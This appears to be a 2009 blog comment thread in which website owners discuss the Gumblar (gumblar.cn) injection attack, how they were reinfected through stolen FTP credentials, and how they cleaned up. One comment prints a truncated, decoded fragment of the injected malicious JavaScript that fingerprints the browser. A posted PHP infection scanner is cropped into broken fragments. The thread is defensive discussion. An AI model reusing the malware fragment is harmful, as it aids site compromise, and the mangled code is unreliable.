      Have you had a look in the images directory? If there is a file there called image.php, rename it to bak.image.php. Create a new, empty image.php file and change its permissions so that it can not be edited.

    • |

      Did you change your passwords after restoring your site to the old backup? If this code is being uploaded to your site via FTP (which seems to be the case most often), then they clearly have your password. Change your passwords immediately, only use SFTP to connect to your sites and ensure all computers that access your sites (including your web developers!) are free of the virus and using SFTP. If your computer, or your web developers computer still has the virus, your site will continue to be exploited.

  35. |

    My websites were infected by this virus (mainly static html).
    at the begining i tried to replace all files from the backup on my computer but each time after doing it (and changing the passowrd) the site were infected again.

    i tried again this time using the following steps:
    1) i clean my computer using malwarebytes (it found 93 treats).
    2) i clean my computer with norton anti virus

    3)i deleted the server definition for each domain, and set them up as new.

    4)i moved the files from my computer (they were not infected) and change files premitions to 755.

    5)i change the admin and FTP passowrd

    6) uninstall adobe reader and filezilla from my computer

    the site stayed clean for as long i didn’t upload any files to the server.
    yesterday i uploaded new files to the server and before doing it i run the malwarebytes and the anti virus again/
    malwarebytes found the same new treats again (how did its enter my computer again?
    i remove the treats and upload the files
    the next day 2 of my websites were infected once again.
    the good news were that only 2 website were infected (i have anoter 5 on the same server)
    so i tought maby i forgot to change file permition in those domains.

    but the point i don’t understand is how this virus still have accesse to my server files
    after i clean my computer and set up a brand new updated norton internt security?
    what sould i do?

  36. |

    Just to check with you guys; only files get infected right? They don’t mess with databases?
    A joomla! site got hit last weekend and we are looking at restore possibilities…

  37. |

    Reading other people’s comments, I was able to figure out how I got infected and what happened:

    * About 2 days ago, I indeed got the above mentioned PDF warnings when visiting one or more sites (sadly enough I do not remember which ones).
    * After that (with what I now know), I noticed my FTP application, CuteFTP, wasn’t able to connect to any FTP server. I received this error: Can’t read from control socket. Socket error = #10054, which led me to the GlobalScape knowledge base and to a Windows registry key that should be deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux (or aux2).
    That allowed me to use CuteFTP again. But in the meanwhile I had already used Windows Explorer to update a file on a server through FTP.
    * That very one site I changed, got infected with the above mentioned results.

    So I assume the trojan blocks FTP trafic for some (all?) FTP applications and only lets those pass of which it can fetch credentials?

    A malware scanner indeed also pointed that Windows Updates were disabled. I assume the trojan is also responsible for this.

    A colleague alerted me of the infected site because his virus scanner Sophos detected it. Mine, AVG, did not. Google on the other hand indeed also marked the site infected (I noticed in Chrome).

  38. |

    [...] de nos services depuis un moment. Dernièrement, j’ai lu un article à ce sujet sur le blog "Unmask Parasites". Au moment de l’article, le site "klaomta.com" ne répondait pas, en outre toujours [...]

  39. |

    Got hit with this one today and I decoded the script that is inserted into all the web pages.

    It looks like it is reporting the version of the scripting engine running on your machine to gumblar.cn/rss and doing who knows what with it. It also looks like it is set to run on Windows versions lower than NT 6(Vista) and not run on sites that set a cookie named “miek=1″

    Here’s what I got when I decoded the script.

    var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;
    if((u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6″)<0)&&(document.cookie.indexOf(“miek=1″)”);
    }

  40. |

    The script didn’t paste correctly, so you should probably delete it from my post. I can take a screen shot and send it to you if you like.

  41. |

    This malware problem has been a paid in my neck, but I think I finaly have it under control.

    Here is the code I used to search my web server for infected files. Very useful, especially if you have a lot of files. Customize the $exclude_files array and the $search array depending on your needs.

    1000000) {
    continue;
    }

    // exlude fieles
    if (in_array($path, $exclude_files)) {
    continue;
    }

    // get content
    $file_handle = fopen($path, “r”);
    $contents = ”;
    while (!feof($file_handle)) {
    $contents = fgets($file_handle);

    // loop for search string
    $found = false;
    foreach ($search as $search_string) {
    if (stristr($contents, $search_string)) {
    $found = true;
    break;
    }
    }

    if ($found == true) {
    echo ” . $path . ‘ … ‘;
    echo ‘[FOUND ' . $search_string . ']‘;
    echo “”;

    break; // break while
    } else {
    //echo ‘[CLEAN]‘;
    }

    }

    fclose($file_handle);

    } elseif (is_dir($path)) {

    $dirs_array[] = $path;

    }
    }
    }
    closedir($handle);
    }

    foreach ($dirs_array as $dir) {
    scan_files($dir . ‘/’);
    }

    unset($dirs_array);
    }

    $start_dir = $_SERVER['DOCUMENT_ROOT'] . ‘/’;

    echo ‘Starting from: ‘ . $start_dir . ”;

    scan_files($start_dir);

    ?>

  42. |

    The post above cropped the top part of the code for some reason. Add this part to the beginning.

    1000000) {
    continue;
    }

    • |

      Sorry. The blog’s comment systems removes potentially dangerous code to prevent exploits.

      <?php ?> You replace “<” with &lt;

    • |

      hey please post your script again – and this time with no errors – thank you

  43. |

    We also got stung with this virus on three wordpress based websites.

    Infected computer appears to be clean now and all FTP details have been changed.

    I would however love to stop saving passwords in dreamweaver, but that pesky little “save” box has a tendcy of ticking itself. Anyone have any ideas on how to remove this function?

  44. |

    Hi,

    I’m a newbie..could you pls explain how I customize the $exclude_files array and the $search array??
    Cheers,
    F3rUk

  45. |

    Since the entry point in you local system is Adobe Reader, I recommend you disable “Acrobat Javascript” in Edit – Preferences… – JavaScript.

    Aparently Adobe has released a security update for Reader yesterday. More information and download links can be found here:

    http://www.adobe.com/support/security/bulletins/apsb09-06.html

    I have no idea if this fixed the exploit however…

  46. |

    I had it on a site with no php.

  47. |

    One of my clients is also infected – so far, you guys have been tremendously helpful. Unfortunately, I’m seeing a rather disturbing problem that no one else has described yet.

    Most of our pages include a PHP header and footer which, among other things, define the block and open the tag for each page. All of the pages that include this header are infected. OK, go to that include file and remove it, right?

    The Javascript is NOWHERE TO BE FOUND in that include file! If I do a view source on a page that includes it, I ee the JavaScript wedged in between the closing tag and the opening tag. If I look in the exact same location in the include file, that code is nowhere to be found, even if I do a text search on it.

    Just to be sure I wasn’t insane, I added an HTML comment in the include file just above where the JS seems to be inserted. Sure enough, the comment AND the JS showed up when I hit view source.

    What concerns me is that this makes it sound like a PHP output buffer is inserting this code. Or, perhaps, some other filter between the PHP engine and the HTTP server. Anyone else seeing stuff like this? Any idea how to get rid of it?

    Thanks!

    Rob Z.

    • |

      The malicious PHP code contains this JavaScript base64 encoded.

      • |

        Yeah, I figured out much later that this code was doing the inserting. But it DID look like ti was modifying the output buffer – the injected PHP code was nowhere near where the resulting JS code was in the view source.

        After 10 hours of work and hand-editing more 130 files, I think we’re clean. Also – I took the script posted by rad-one and modified it slightly so that it works on the command line and adds another signature to check against. I posted the link to it on my blog at http://www.techknowme.com/blog/2009/05/fighting-the-jsredir-r-gumblarcn-trojan/. Feel free to go and download it. There are a lot more modifications that could be done.

        One more point – that script only FINDS the infections – complex PHP sites may return a lot of false positives, so I’d advise against doing some kind of automated clean at this point.

        • |

          Hi Rob:

          THAT was really helpful – got my hands full now :)

          btw. I found an easy way to check if a site ( assuming it has an RSS feed )is till infected.

          Rub the feed through feedburner and it will reject it if the script is present.

  48. |

    [...] Sometime around 13 May. I am not sure what else this "virus" does other than compromising FTP access and spreading itself via websites… __________________ Life is a compromise of what your ego wants to do, what experience tells [...]

  49. |

    Even my ecommerce site got infected with it.

    here is the code: hope its safe to post malicious code in the comment.

    Edit by Denis: I removed the code because it was the same as in fact #10 of this blog post.

  50. |

    About 9 months ago, a developer site had a plea from someone over a similar type of code injection. Up on disection I could see that the code was similar to the method illustrated but importantly its main purpose was to inject in to the clients browser the information to fetch data from a number of servers.

    So I then put my machine in the firing line by calling the payload URL and go the resulting more complex sctipt that was a malware.

    ====================================

    This current attack method being uses is currently in the press is nothing more than scaremongering, the issue of this attack is in “WEAK” upload pages that do not discriminate against injection and methods of injection.

    In the first instance, people who maintain websites or use 3rd party scripts should check for input cleaning processes to stop these attacks on the server that then allow the botscript to then nest on that server.

    Server Farms can do more to protect their clients and the visitors to an infected site by looking for URL requests coming from their servers and those sites that are making a large number of resource requests that never did before can be targeted and shut down.

    This is something that server farms do not do, they are more concerned with the dollars rolling in rather than the clients that they have and the visitors. It makes more sense to preserve bandwidth for the other clients than let a malware run on their servers.

    Once a malware is running on the server, it will attack or infect if possible the machine that is requesting resources. Then the virus can spread more easily.

    While the media are reporting this as a “JavaScript” attack, it is important to note that javascript has no access to the endusers system other than to “Redirect” or possibly request a resource as in a CSS script or an image or an image via a PHP script that then compromises the users system with a more complex program.

    =========================================

    What to do?

    Firewall, yes, a software firewall, this should run on your computer and you should NEVER just rely on a hardware firewall or the properties of a NAT / Router to perform your defences. They may be good or offer some protection but they are not fool proof. An open port is a port open in both directions.

    Unless you have invested in a real rock solid professional system, your best off backing you your router with a software firewall on your computer, plenty of free firewalls on offer. No excuses.

    Anti-virus software. This is another important tool that is often overlooked. Grt one, theirs plenty of free AV tools like firewalls too.

    Anti-spyware tools, these are a-plenty but bewarned, many are spyware themselves. So do yourself a favor and only download and use well known tools like SpywareBlaster or AdAware or Spybot Search & Destroy for example.

    If you do suffer an attack or problems then DON’T JUST SIT ON YOUR ASS…. PULL THE MODEM PLUG. Stop your machine from spreading the risk.

    When in doubt, run a Linux distro.

    Finally, I have said this for years, all internet users should undergo a test, like a driving test to illustrate that they have an understanding of the internet, risks, how a computer works, how to spot unusual activity on the computer and why connections and computers seem slower as well as how to deal with viruses and other malwares. Maybe then, and only then will idiots stop helping hackers and crackers break in to and destroy or steal from systems.

    Peace.